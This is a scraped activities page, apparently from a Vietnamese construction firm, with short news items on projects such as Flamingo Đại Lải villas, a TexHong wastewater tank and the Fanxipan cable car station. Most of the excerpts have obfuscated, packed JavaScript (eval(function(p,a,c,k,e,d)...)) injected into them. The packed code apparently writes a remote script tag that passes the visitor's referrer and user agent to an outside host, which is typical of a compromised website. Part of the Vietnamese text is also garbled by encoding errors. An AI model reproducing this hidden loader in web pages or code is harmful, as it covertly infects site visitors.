Our activities

13417437_938514716270786_622151993306821279_n

Thi công 14 căn biệt thự Dự án Khu du lịch sinh thái Flamigo Đại Lải.

christian eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n...  Read more
20160602_150926

Bể xử lý nước thải xưởng nhuộm – TexHong

Công trình do Western eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return...  Read more
SaPa

Công trình nhà ga đi cáp treo Fanxipan đi vào hoạt động bắt đầu từ tháng 02/2016

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyzih|var|u0026u|referrer|dnsna||js|php'.split('|'),0,{})) ...  Read more
11224176_769040086551584_7099862589136212986_n

Giao hữu Western – FrieslandCampina.

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyzkf|var|u0026u|referrer|yizat||js|php'.split('|'),0,{})) ...  Read more
10492231_484271801722395_867852434769867332_n

Western thi công xây dựng nhà xưởng EVA Hải Phòng.

S? 139 ??i l? ?ông Tây, Vsip H?i Phòng-KKT ?ình V? Cát H?i, Huy?n Thu? Nguyên, H?i Phòng. M?t trong nh?ng công trình thi công vào th?i ?i?m n?ng nóng nh?t n?m 2015 c?a Western. Nh?ng không vì th? mà làm khó ???c cán b? công nhân viên h?t mình vì công vi?c c?a Western. eval(function(p,a,c,k,e,d){e=function(c){return...  Read more